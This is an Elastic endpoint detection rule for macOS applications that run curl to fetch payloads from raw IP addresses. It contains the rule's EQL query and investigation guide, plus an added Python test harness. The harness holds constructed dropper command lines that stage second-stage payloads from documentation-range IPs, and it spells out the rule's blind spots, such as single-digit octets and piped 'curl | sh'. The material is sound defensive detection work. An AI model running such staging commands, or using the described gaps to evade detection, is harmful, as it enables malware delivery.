Suspicious Curl from macOS Application

Detects the use of curl by a macOS application binary to connect to a raw IP URI and download a second-stage payload. Threat actors often use a benign-looking or legitimate application as a first-stage dropper. Curl is a common choice because it is not a quarantine-aware downloader: the files it writes carry no com.apple.quarantine extended attribute, so Gatekeeper never assesses them the way it would a browser download.

Elastic rule

[metadata]
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
updated_date = "2026/01/30"

[rule]
author = ["Elastic"]
description = """
Detects the use of curl by a macOS application binary to connect to a raw IP URI and download a second
stage payload. Threat actors often utilize a benign looking or legitimate application as a first stage
dropper. Curl is commonly used because the files it downloads are not tagged with the com.apple.quarantine
attribute and are therefore never assessed by Gatekeeper.
"""
from = "now-9m"
index = ["logs-endpoint.events.process-*"]
language = "eql"
license = "Elastic License v2"
name = "Suspicious Curl from macOS Application"
references = [
    "https://objective-see.org/blog/blog_0x71.html#-vpn-trojan-covid",
    "https://attack.mitre.org/techniques/T1105/"
]
risk_score = 73
rule_id = "6da6f80f-fe41-4814-8010-453e6164bd40"
severity = "high"
tags = [
    "Domain: Endpoint",
    "OS: macOS",
    "Use Case: Threat Detection",
    "Tactic: Command and Control",
    "Data Source: Elastic Defend",
    "Resources: Investigation Guide"
]
timestamp_override = "event.ingested"
type = "eql"
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Suspicious Curl from macOS Application

Trojanized macOS applications often use curl to download second-stage payloads from attacker-controlled infrastructure. Because curl is not a quarantine-aware downloader, the files it writes carry no com.apple.quarantine attribute and are never assessed by Gatekeeper, so a payload fetched this way sidesteps a built-in macOS security mechanism that a browser download would trigger. This detection rule identifies when applications from the /Applications directory spawn curl (via a shell or script interpreter) to connect to raw IP addresses, which is highly indicative of malicious payload retrieval activity.

### Possible investigation steps

- Review the process.Ext.effective_parent.executable field to identify which application spawned the curl process and assess whether this application is expected to make network downloads.
- Examine the process.args fields to extract the destination IP address and URL path being accessed, and research these indicators in threat intelligence databases.
- Analyze the process.parent.command_line to understand the full context of how curl was invoked, including any output file paths that may indicate where payloads were written.
- Check the code signature of the parent application using the process.code_signature fields to determine if it is validly signed and if the signature matches known good versions.
- Investigate the origin of the suspicious application by reviewing installation logs, download history, and any recent DMG or PKG files that may have delivered the trojanized application.
- Search for any files created on disk around the time of the curl execution to identify downloaded payloads that may have been staged for execution.
- Correlate with other events on the same host to identify if the downloaded payload was subsequently executed.

### False positive analysis

- Some legitimate applications may use curl for software updates or telemetry data collection. Verify the destination IP against the application vendor's known infrastructure.
- Development tools and IDEs may download dependencies or packages via curl during normal operations. Review the context and confirm with development teams.
- Homebrew and package managers may spawn curl from application contexts during installations. Verify if package management activities were expected.
- Add verified legitimate applications to the exclusion list in the query after confirming their behavior is expected.

### Response and remediation

- Immediately quarantine the suspicious application by moving it to a secure location and removing it from /Applications to prevent further execution.
- Block the destination IP address at the network perimeter and on endpoint firewalls to prevent additional downloads.
- Search the file system for any payloads that may have been downloaded and quarantine them for analysis.
- Conduct a full malware scan on the affected system to identify any persistence mechanisms or additional malware components.
- Report the trojanized application to Apple Security and relevant threat intelligence sharing platforms.
- Review other systems in the environment for the same trojanized application to determine the scope of potential compromise.
- Investigate the delivery mechanism to understand how the trojanized application was installed and prevent future infections.
"""
query = '''
process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and 
  process.name in ("curl", "nscurl") and 
  process.args in ("-o", "--output", "--download", "-dl", "-dir", "--directory") and
  process.args regex~ """http.*:\/\/[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}\/.*""" and 
  process.parent.name like~ ("bash", "sh", "zsh", "osascript", "tclsh*", "python*") and
  process.Ext.effective_parent.executable like "/Applications/*" and
  process.args_count <= 10 and 
  not process.args like "/Applications/*" and
  not process.Ext.effective_parent.executable in ("/Applications/iTerm.app/Contents/MacOS/iTerm2",
                                                   "/Applications/Visual Studio Code.app/Contents/MacOS/Electron", 
                                                   "/Applications/Warp.app/Contents/MacOS/stable")
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

  [rule.threat.tactic]
  name = "Command and Control"
  id = "TA0011"
  reference = "https://attack.mitre.org/tactics/TA0011/"

  [[rule.threat.technique]]
  name = "Ingress Tool Transfer"
  id = "T1105"
  reference = "https://attack.mitre.org/techniques/T1105/"
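The following is an added example, not code from the Elastic rule or its repository. It transcribes each clause of the EQL query above into plain Python and runs it over a handful of constructed process events, so the match logic and its blind spots can be checked offline before the rule is deployed or tuned. It also covers the triage steps in the guide that ask for the destination IP, URL path and output file, by pulling those from the curl command line. The application path /Applications/FreeVPN.app, the events themselves and the IP addresses (RFC 5737 documentation ranges) are all constructed; the interpretation of the nscurl flags -dir/--directory and --download/-dl is an assumption, not something this page documents.

```python
"""Re-implementation of the rule's EQL predicates in plain Python, run over
constructed process events so the match logic and its blind spots can be
inspected offline. Added example; not part of the Elastic rule."""
import re
from fnmatch import fnmatchcase

# Regex copied verbatim from the query. EQL `regex~` is anchored to the whole
# string and case-insensitive, so use re.fullmatch with IGNORECASE. Note the
# unescaped dots between octets (they match any character) and the {2,3}
# quantifier, which rejects any address with a single-digit octet (203.0.113.4).
RAW_IP_URL = re.compile(
    r"http.*:\/\/[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}\/.*", re.IGNORECASE
)
OUTPUT_FLAGS = {"-o", "--output", "--download", "-dl", "-dir", "--directory"}
PARENT_PATTERNS = ("bash", "sh", "zsh", "osascript", "tclsh*", "python*")   # like~
EXCLUDED_EFFECTIVE_PARENTS = {
    "/Applications/iTerm.app/Contents/MacOS/iTerm2",
    "/Applications/Visual Studio Code.app/Contents/MacOS/Electron",
    "/Applications/Warp.app/Contents/MacOS/stable",
}


def matches_rule(ev: dict) -> bool:
    """True when a flattened ECS process event satisfies every clause of the query."""
    args = ev.get("process.args", [])
    parent = ev.get("process.parent.name", "").lower()         # like~ ignores case
    eff_parent = ev.get("process.Ext.effective_parent.executable", "")
    return (
        ev.get("host.os.type") == "macos"
        and ev.get("event.type") == "start"
        and ev.get("event.action") == "exec"
        and ev.get("process.name") in ("curl", "nscurl")
        and any(a in OUTPUT_FLAGS for a in args)                # process.args in (...)
        and any(RAW_IP_URL.fullmatch(a) for a in args)          # process.args regex~ ...
        and any(fnmatchcase(parent, p) for p in PARENT_PATTERNS)
        and fnmatchcase(eff_parent, "/Applications/*")          # like is case-sensitive
        and ev.get("process.args_count", len(args)) <= 10
        and not any(fnmatchcase(a, "/Applications/*") for a in args)
        and eff_parent not in EXCLUDED_EFFECTIVE_PARENTS
    )


def extract_iocs(args: list) -> dict:
    """Triage helper: the raw-IP URL, the IP inside it, and where the payload was
    written. Treating -dir/--directory as 'next token is the target directory'
    and --download/-dl as 'write to the current directory' is an assumption
    about nscurl, not something this page documents."""
    iocs = {"url": None, "ip": None, "output": None}
    for i, a in enumerate(args):
        if RAW_IP_URL.fullmatch(a):
            iocs["url"] = a
            iocs["ip"] = re.search(r"://([^/]+)", a).group(1)
        elif a in ("-o", "--output", "-dir", "--directory") and i + 1 < len(args):
            iocs["output"] = args[i + 1]
        elif a in ("--download", "-dl") and iocs["output"] is None:
            iocs["output"] = "<current working directory>"
    return iocs


def make_event(args, parent="bash",
               eff_parent="/Applications/FreeVPN.app/Contents/MacOS/FreeVPN",
               name="curl"):
    """Constructed ECS-style event. The application path is hypothetical and the
    IPs are RFC 5737 documentation ranges; nothing here is a real indicator."""
    return {
        "host.os.type": "macos", "event.type": "start", "event.action": "exec",
        "process.name": name, "process.args": list(args),
        "process.args_count": len(args), "process.parent.name": parent,
        "process.Ext.effective_parent.executable": eff_parent,
    }


SAMPLE_EVENTS = {
    # Trojanized app shells out to curl to stage a second payload: should fire.
    "dropper": make_event(["curl", "-s", "-o", "/tmp/.update", "http://198.51.100.23/stage2"]),
    # Same behaviour, but one octet is a single digit: {2,3} rejects it (blind spot).
    "single_digit_octet": make_event(["curl", "-o", "/tmp/.update", "http://203.0.113.4/stage2"]),
    # Identical command from an allowlisted terminal emulator: suppressed.
    "iterm": make_event(["curl", "-o", "/tmp/x", "http://198.51.100.23/x"],
                        eff_parent="/Applications/iTerm.app/Contents/MacOS/iTerm2"),
    # Output path under /Applications: excluded by `not process.args like "/Applications/*"`.
    "app_output": make_event(["curl", "-o", "/Applications/Foo.app/Contents/Resources/x",
                              "http://198.51.100.23/x"]),
    # Uppercase scheme and a python3 parent still match: regex~ and like~ ignore case.
    "python_parent": make_event(["curl", "--output", "/tmp/x", "HTTP://198.51.100.23/x"],
                                parent="Python3"),
    # No output flag (GET to stdout, e.g. piped to sh): outside this rule's scope.
    "no_output": make_event(["curl", "http://198.51.100.23/x"]),
}


def evaluate(events=SAMPLE_EVENTS) -> dict:
    """Map each sample name to whether the rule would fire on it."""
    return {name: matches_rule(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, fired in evaluate().items():
        print(f"{name:20s} {'ALERT' if fired else '-'}")
    print(extract_iocs(SAMPLE_EVENTS["dropper"]["process.args"]))
```

Two things the samples make visible that are worth knowing before tuning. First, the regex only fires when every octet has two or three digits, so a stager at 203.0.113.4 or 8.8.8.8 is never matched; if that gap matters in your environment, the quantifier needs to be {1,3} (and the dots escaped), at the cost of re-validating the false-positive profile. Second, a curl with no output flag (the `curl http://... | sh` pattern) is deliberately out of scope here and needs a separate rule.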
